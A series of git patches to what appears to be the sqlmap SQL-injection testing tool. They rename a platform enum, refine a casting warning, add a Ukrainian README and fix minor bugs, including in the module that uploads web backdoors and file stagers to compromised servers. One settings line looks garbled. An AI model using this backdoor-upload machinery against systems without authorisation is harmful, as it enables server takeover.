c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -16ba53ca22bb764b6cdee725ffe41618 lib/core/settings.py +08295f121daafa4c20282201861422cb lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -234,7 +234,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -82f2326ec9cc8719859266f72c19f9b3 sqlmap.py +83d4d43cf6ce06635418ce75ae71eb90 sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From 9564c8e8b1984e5f7eba741750cfca5fbde387f7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 21 Dec 2018 11:29:57 +0100 Subject: [PATCH 409/428] Refactoring regarding casting warnings --- lib/controller/checks.py | 17 ++++++++++++++--- lib/core/enums.py | 2 +- lib/core/settings.py | 4 ++-- lib/request/connect.py | 4 ++-- lib/takeover/web.py | 34 +++++++++++++++++----------------- txt/checksum.md5 | 10 +++++----- 6 files changed, 41 insertions(+), 30 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 104aeec9e52..05bfd6cd93d 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -69,6 +69,7 @@ from lib.core.enums import PAYLOAD from lib.core.enums import PLACE from lib.core.enums import REDIRECTION +from lib.core.enums import WEB_PLATFORM from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapNoneDataException @@ -1052,9 +1053,19 @@ def _(page): kb.heuristicTest = HEURISTIC_TEST.CASTED if casting else HEURISTIC_TEST.NEGATIVE if not result else HEURISTIC_TEST.POSITIVE if casting: - errMsg = "possible %s casting " % ("integer" if origValue.isdigit() else "type") - errMsg += "detected (e.g. \"$%s=intval($_REQUEST['%s'])\") " % (parameter, parameter) - errMsg += "at the back-end web application" + errMsg = "possible %s casting detected (e.g. '" % ("integer" if origValue.isdigit() else "type") + + platform = conf.url.split('.')[-1].lower() + if platform == WEB_PLATFORM.ASP: + errMsg += "%s=CInt(request.querystring(\"%s\"))" % (parameter, parameter) + elif platform == WEB_PLATFORM.ASPX: + errMsg += "int.TryParse(Request.QueryString[\"%s\"], out %s)" % (parameter, parameter) + elif platform == WEB_PLATFORM.JSP: + errMsg += "%s=Integer.parseInt(request.getParameter(\"%s\"))" % (parameter, parameter) + else: + errMsg += "$%s=intval($_REQUEST[\"%s\"])" % (parameter, parameter) + + errMsg += "') at the back-end web application" logger.error(errMsg) if kb.ignoreCasted is None: diff --git a/lib/core/enums.py b/lib/core/enums.py index 45b08c526d1..16125dd1717 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -310,7 +310,7 @@ class ADJUST_TIME_DELAY: NO = 0 YES = 1 -class WEB_API: +class WEB_PLATFORM: PHP = "php" ASP = "asp" ASPX = "aspx" diff --git a/lib/core/settings.py b/lib/core/settings.py index 70c2280a578..c7291655a01 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.35" +VERSION = "1.2.12.36" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -687,7 +687,7 @@ MAX_CONNECT_RETRIES = 100 # Strings for detecting formatting errors -FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "TypeMismatchException", "CF_SQL_INTEGER", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "is not of type numeric", "__VIEWSTATE[^"]*)[^>]+value="(?P[^"]+)' diff --git a/lib/request/connect.py b/lib/request/connect.py index 8dfe9438357..f5f3642fe4c 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -78,7 +78,7 @@ class WebSocketException(Exception): from lib.core.enums import PLACE from lib.core.enums import POST_HINT from lib.core.enums import REDIRECTION -from lib.core.enums import WEB_API +from lib.core.enums import WEB_PLATFORM from lib.core.exception import SqlmapCompressionException from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapGenericException @@ -889,7 +889,7 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent postUrlEncode = False if conf.hpp: - if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): + if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_PLATFORM.ASP, WEB_PLATFORM.ASPX)): warnMsg = "HTTP parameter pollution should work only against " warnMsg += "ASP(.NET) targets" singleTimeWarnMessage(warnMsg) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 67e0fdcb1ef..921366a00b1 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -43,7 +43,7 @@ from lib.core.enums import OS from lib.core.enums import PAYLOAD from lib.core.enums import PLACE -from lib.core.enums import WEB_API +from lib.core.enums import WEB_PLATFORM from lib.core.exception import SqlmapNoneDataException from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT from lib.core.settings import EVENTVALIDATION_REGEX @@ -60,7 +60,7 @@ class Web: """ def __init__(self): - self.webApi = None + self.webPlatform = None self.webBaseUrl = None self.webBackdoorUrl = None self.webBackdoorFilePath = None @@ -109,14 +109,14 @@ def _webFileStreamUpload(self, stream, destFileName, directory): except TypeError: pass - if self.webApi in getPublicTypeMembers(WEB_API, True): + if self.webPlatform in getPublicTypeMembers(WEB_PLATFORM, True): multipartParams = { "upload": "1", "file": stream, "uploadDir": directory, } - if self.webApi == WEB_API.ASPX: + if self.webPlatform == WEB_PLATFORM.ASPX: multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE @@ -130,7 +130,7 @@ def _webFileStreamUpload(self, stream, destFileName, directory): else: return True else: - logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webApi) + logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webPlatform) return False def _webFileInject(self, fileContent, fileName, directory): @@ -158,13 +158,13 @@ def webInit(self): remote directory within the web server document root. """ - if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None: + if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webPlatform is not None: return self.checkDbmsOs() default = None - choices = list(getPublicTypeMembers(WEB_API, True)) + choices = list(getPublicTypeMembers(WEB_PLATFORM, True)) for ext in choices: if conf.url.endswith(ext): @@ -172,7 +172,7 @@ def webInit(self): break if not default: - default = WEB_API.ASP if Backend.isOs(OS.WINDOWS) else WEB_API.PHP + default = WEB_PLATFORM.ASP if Backend.isOs(OS.WINDOWS) else WEB_PLATFORM.PHP message = "which web application language does the web server " message += "support?\n" @@ -196,7 +196,7 @@ def webInit(self): logger.warn("invalid value, it must be between 1 and %d" % len(choices)) else: - self.webApi = choices[int(choice) - 1] + self.webPlatform = choices[int(choice) - 1] break if not kb.absFilePaths: @@ -266,16 +266,16 @@ def webInit(self): _.append("%s/%s" % (directory.rstrip('/'), path.strip('/'))) directories = _ - backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) - backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoors", "backdoor.%s_" % self.webApi)) + backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webPlatform) + backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoors", "backdoor.%s_" % self.webPlatform)) - stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webApi)) + stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webPlatform)) for directory in directories: if not directory: continue - stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) + stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webPlatform) self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) uploaded = False @@ -317,14 +317,14 @@ def webInit(self): infoMsg += "via UNION method" logger.info(infoMsg) - stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi) + stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webPlatform) self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName) handle, filename = tempfile.mkstemp() os.close(handle) with open(filename, "w+b") as f: - _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webApi)) + _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webPlatform)) _ = _.replace(SHELL_WRITABLE_DIR_TAG, utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)) f.write(_) @@ -353,7 +353,7 @@ def webInit(self): logger.warn(warnMsg) continue - elif self.webApi == WEB_API.ASPX: + elif self.webPlatform == WEB_PLATFORM.ASPX: kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage) kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage) @@ -361,7 +361,7 @@ def webInit(self): infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl) logger.info(infoMsg) - if self.webApi == WEB_API.ASP: + if self.webPlatform == WEB_PLATFORM.ASP: match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage) if match: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 31c3ac8d3cc..fc51b650672 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -23,7 +23,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -0f0feede9750be810d2b8a7ab159b7b0 lib/controller/checks.py +d4582467b0735525d8d8bdc0396ec87f lib/controller/checks.py 197bdf07f8ea15ecc7e0dafea4f9ae2f lib/controller/controller.py 988b548f6578adf9cec17afdeee8291c lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -37,7 +37,7 @@ c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py ac7c070b2726d39fbac1916b1a5f92b2 lib/core/dicts.py 760de985e09f5d11aacd3a8f2d8e9ff2 lib/core/dump.py -0cf974cf4ff3b96e1a349a12e39f4693 lib/core/enums.py +5b6999c4b78180961e9f33e172d4dd66 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -08295f121daafa4c20282201861422cb lib/core/settings.py +3afa2b42741332ce14a8c98befcfdff7 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -40c4cc791ec657b612ccecf5b3241651 lib/request/connect.py +7ec820ec27161208a8411d81ec48161a lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py @@ -88,7 +88,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 4bf186a747e1a0c4ed5127ef064c3920 lib/takeover/metasploit.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 6a49f359b922df0247eb236126596336 lib/takeover/udf.py -a3d07df8a780c668a11f06be42014cdc lib/takeover/web.py +ce8524022df29602f3d6c3c41f938ad4 lib/takeover/web.py debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py From 7d1c2633c92f9589e1c02c113c434c5220d57da2 Mon Sep 17 00:00:00 2001 From: Denis Date: Sun, 23 Dec 2018 10:24:53 +0200 Subject: [PATCH 410/428] Add contributed Ukrainian translation (#3414) --- README.md | 1 + doc/translations/README-uk-UA.md | 50 ++++++++++++++++++++++++++++++++ 2 files changed, 51 insertions(+) create mode 100644 doc/translations/README-uk-UA.md diff --git a/README.md b/README.md index ae75b0e606d..ad48e852818 100644 --- a/README.md +++ b/README.md @@ -67,3 +67,4 @@ Translations * [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md) * [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) * [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) +* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md) diff --git a/doc/translations/README-uk-UA.md b/doc/translations/README-uk-UA.md new file mode 100644 index 00000000000..ddbedef9fe7 --- /dev/null +++ b/doc/translations/README-uk-UA.md @@ -0,0 +1,50 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap - це інструмент для тестування вразливостей з відкритим сирцевим кодом, який автоматизує процес виявлення і використання дефектів SQL-ін'єкцій, а також захоплення серверів баз даних. Він оснащений потужним механізмом виявлення, безліччю приємних функцій для професійного тестувальника вразливостей і широким спектром скриптів, які спрощують роботу з базами даних - від відбитка бази даних до доступу до базової файлової системи та виконання команд в операційній системі через out-of-band з'єднання. + +Скриншоти +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Ви можете ознайомитися з [колекцією скриншотів](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), які демонструють деякі функції в wiki. + +Встановлення +---- + +Ви можете завантажити останню версію tarball натиснувши [сюди](https://github.com/sqlmapproject/sqlmap/tarball/master) або останню версію zipball натиснувши [сюди](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Найкраще завантажити sqlmap шляхом клонування [Git](https://github.com/sqlmapproject/sqlmap) репозиторію: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap «працює з коробки» з [Python](http://www.python.org/download/) версії **2.6.x** та **2.7.x** на будь-якій платформі. + +Використання +---- + +Щоб отримати список основних опцій і перемикачів, використовуйте: + + python sqlmap.py -h + +Щоб отримати список всіх опцій і перемикачів, використовуйте: + + python sqlmap.py -hh + +Ви можете знайти приклад виконання [тут](https://asciinema.org/a/46601). +Для того, щоб ознайомитися з можливостями sqlmap, списком підтримуваних функцій та описом всіх параметрів і перемикачів, а також прикладами, вам рекомендується скористатися [інструкцією користувача](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Посилання +---- + +* Основний сайт: http://sqlmap.org +* Завантаження: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) або [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Канал новин RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Відстеження проблем: https://github.com/sqlmapproject/sqlmap/issues +* Інструкція користувача: https://github.com/sqlmapproject/sqlmap/wiki +* Поширенні питання (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Скриншоти: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots From 63cca82288c37abe7ce599340f1c5a065810d5a6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 23 Dec 2018 09:57:50 +0100 Subject: [PATCH 411/428] Fixes #3415 --- lib/core/settings.py | 2 +- lib/utils/sqlalchemy.py | 3 +++ txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c7291655a01..5e1f884f56e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.36" +VERSION = "1.2.12.37" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py index 4315cf7d033..928bdeda9bd 100644 --- a/lib/utils/sqlalchemy.py +++ b/lib/utils/sqlalchemy.py @@ -32,6 +32,7 @@ from lib.core.data import logger from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapFilePathException +from lib.core.exception import SqlmapMissingDependence from plugins.generic.connector import Connector as GenericConnector class SQLAlchemy(GenericConnector): @@ -79,6 +80,8 @@ def connect(self): raise SqlmapConnectionException("SQLAlchemy connection issue ('%s')" % msg[0]) self.printConnected() + else: + raise SqlmapMissingDependence("SQLAlchemy not available") def fetchall(self): try: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fc51b650672..f6b0bae358f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3afa2b42741332ce14a8c98befcfdff7 lib/core/settings.py +29c9671c1f1e13c08b857885fffcbfd0 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -115,7 +115,7 @@ eb2aa3fa9ebdf4cb6ac3e005f7df1e9b lib/utils/hash.py 683c3bd05b6164f56a57ed495c162684 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py -571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py +cede46255b3c8f8d0b425b1c72cac75a lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py 4703ceeb32131a9a7a6561575644123b lib/utils/versioncheck.py e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py From 37de01e99372dc9616febdc33679b6372de8d8f9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 23 Dec 2018 10:18:27 +0100 Subject: [PATCH 412/428] Fixes #3417 --- lib/core/settings.py | 2 +- lib/request/connect.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 5e1f884f56e..8756afde235 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.37" +VERSION = "1.2.12.38" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index f5f3642fe4c..bbf98ced65b 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -963,11 +963,11 @@ def _adjustParameter(paramString, parameter, newValue): retVal = paramString match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString, re.I) if match: - retVal = re.sub(re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString, flags=re.I) + retVal = re.sub("(?i)%s" % re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString) else: match = re.search(r"(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString, re.I) if match: - retVal = re.sub(re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString, flags=re.I) + retVal = re.sub("(?i)%s" % re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString) return retVal token = AttribDict() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f6b0bae358f..611162970d7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -29c9671c1f1e13c08b857885fffcbfd0 lib/core/settings.py +6487983b44e37792b7b5a1581ca943c7 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -7ec820ec27161208a8411d81ec48161a lib/request/connect.py +999f9b050ffe9e9b7ddbc9fdb0a18432 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From 6ce0350abc9d0b435358b2dd3c7519a3dcc20eac Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 26 Dec 2018 22:12:13 +0100 Subject: [PATCH 413/428] Fixes #3420 --- lib/core/settings.py | 2 +- lib/request/basic.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 8756afde235..34cfd8ea68d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.38" +VERSION = "1.2.12.39" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/basic.py b/lib/request/basic.py index 9dd83434323..f60ead067cd 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -342,7 +342,7 @@ def _(match): retVal = match.group(0) try: retVal = unichr(int(match.group(1))) - except ValueError: + except (ValueError, OverflowError): pass return retVal page = re.sub(r"&#(\d+);", _, page) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 611162970d7..50d6d47f8ec 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6487983b44e37792b7b5a1581ca943c7 lib/core/settings.py +9a25febb08854816a83ee455005b865d lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -69,7 +69,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py -2b81435f5a7519298c15c724e3194a0d lib/request/basic.py +67c035eda3066b44c592b2f602e44b3e lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py 999f9b050ffe9e9b7ddbc9fdb0a18432 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py From ddee027afbc9229d20fdb5d585d2d8ec82d7e28f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 26 Dec 2018 23:23:49 +0100 Subject: [PATCH 414/428] Minor message update --- lib/core/settings.py | 2 +- lib/request/connect.py | 8 +++++--- txt/checksum.md5 | 4 ++-- 3 files changed, 8 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 34cfd8ea68d..30de22c11d5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.39" +VERSION = "1.2.12.40" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index bbf98ced65b..967c5916291 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -174,9 +174,11 @@ def _retryProxy(**kwargs): warnMsg += "(e.g. 'https://help.ubuntu.com/community/Tor')" else: warnMsg = "if the problem persists please check that the provided " - warnMsg += "target URL is valid. In case that it is, you can try to rerun " - warnMsg += "with the switch '--random-agent' turned on " - warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)" + warnMsg += "target URL is reachable. In case that it is, " + warnMsg += "you can try to rerun with " + if not conf.randomAgent: + warnMsg += "switch '--random-agent' and/or " + warnMsg += "proxy switches ('--ignore-proxy', '--proxy',...)" singleTimeWarnMessage(warnMsg) elif conf.threads > 1: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 50d6d47f8ec..e96e0f067a6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9a25febb08854816a83ee455005b865d lib/core/settings.py +03f706e4caefe69887515d9e7cb56748 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 67c035eda3066b44c592b2f602e44b3e lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -999f9b050ffe9e9b7ddbc9fdb0a18432 lib/request/connect.py +bd5e2ad9dd0505bdaae180b323a8fa34 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 